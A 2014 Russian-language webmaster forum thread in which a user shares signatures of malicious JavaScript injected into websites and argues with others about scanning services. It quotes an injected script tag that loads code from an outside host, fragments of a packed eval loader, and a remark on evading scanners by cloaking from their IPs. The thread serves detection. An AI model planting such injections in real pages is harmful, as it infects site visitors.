<script src="http://kokiase.edns.biz/koala.php#XXXXX" type="text/javascript">
Содержится на большом количестве сайтов.
XXXXXXX/js/behavior.js
Путь к скрипту может быть и другой!
Содержит следующие строки:
eval(function(p,a,c,k,e,d){e=function(c){ ...
var|document| ...
function| ...
return| ...
getElementsByTagName|setAttribute|indexOf
createElement|if|text|type|reverse|split|
javascript|join|head|script|navigator|win|userAgent|toLowerCase|chrome|src|
appendChild|http|pp|ua'.split('|'),0,{}))
!!! Также содержит строки вроде |AAKYVUG| , их пришлось выкинуть, неизвестно насколько они уникальны. !!!
Не переапутайте это с простым упакованным скриптом.
GKC,
Я Вас не понял. Я показал сигнатуру о которой и не слышали. Но используют, чтобы нагнуть ваши сайты.
Вы сказали покажи линк, чтобы не палился всеми - показал. Рано или поздно этот сайт уйдет в бан.
Тему опубликовал в разделе безопасность. Чтобы помочь.
А может линков мало, так у меня таких 2K.
А Вы можете показать, что-будь новое?
Теперь Вы понимаете, какой инфой я обладаю.
Рекомендую присмотреться к сайту УДАЛЕНО
И обратить внимание на строчку <SCRIPT language="Javascript" src="http:/img/codes.js"></SCRIPT>
Скан от сейчас (УДАЛЕНО):
https://www.virustotal.com/ru/url/110bbfcf6ce73b5ff615d7bfb9569f281881bdf1e5df807354bfa39560722bfc7e/analysis/1392052035/
Надеюсь тупых предположений не будет. Я занимаюсь поиском, а не наоборот.
Есть еще вопросы?
TF-Studio,
Да
проверим через virustotal.
Чем могу доказать свою состоятельность?
Вообще-то я не хотел разбрасывать больше одного примера за день, но ради дела...
Могу гаранту скинуть адрес зараженного сайта, при этом он не обнаруживается Y или G safebrowsing.
Согласен, извиняюсь.
Насколько я понял ваш сервис сверяет дамп страницы, с сохранением и если изменился - алерт.
Возможно более узко - проверяется появлние новых iframe script.
Вот узкие места:
- вредоносный код загружается из стороннего ресурса(AD)
- узнать используемые ip, добавив левый сайт, и выдавать, что "нужно". Это к сожалению главный баг.
Я пошел по другому пути.
"С потолка" я получаю свежие сигнатуры, и простейшим сканером ищу их.
Получается по 50-100 найденных за сутки.
При 100-160K обследуемых.
Цель самопиар через полезную работу.
TF-Studio, Поясните?
Хотя...
подпись: kgtu5 - помогу с сайтом, удалю вирусы -> отзывы ТУТ и ТАМ
подпись: TF-Studio - Защищаем свои сайты от взлома - для получения инвайта пишите в личку свою почту.
И уж не за бесплатно работаем. А тут какой-то дебил палит темы... Да?
А по делу. Как и AK47.info (TF-Studio) так и почему-то хваленый antivirus-alarm.ru и подобные:
1) Где взять новые сигнатуры?
2) А если заражение идет через флеш, как поймаете. Не говоря уже о чем то другом.
3) А вот возьму и на лету проверю "правильный" сайт. Запишу в блокнотик ip, и не буду показывать этому ip ничего.
Было найдено на двух сайтах.
CMS-детекторами определить не удалось.
Анализ попадания и заплатки это не моё. Я занимаюсь тем, что ищу подобные сайты. Пилю, а точнее допилил, свою собственную safebrowsing.
Оба сайта, кстати, до сих пор не помечены ни яндексе, ни в google.---------- Добавлено 10.02.2014 в 14:10 ----------Смысл в том, что здесь собираюсь публиковать самые новые вирусные образцы, которые нахожу.
И если сегодня Yandex или Google SafeBrowsing не банит за это, то завтра вполне.
А я нахожу это уже сегодня. Вот в чем ценность этой информации.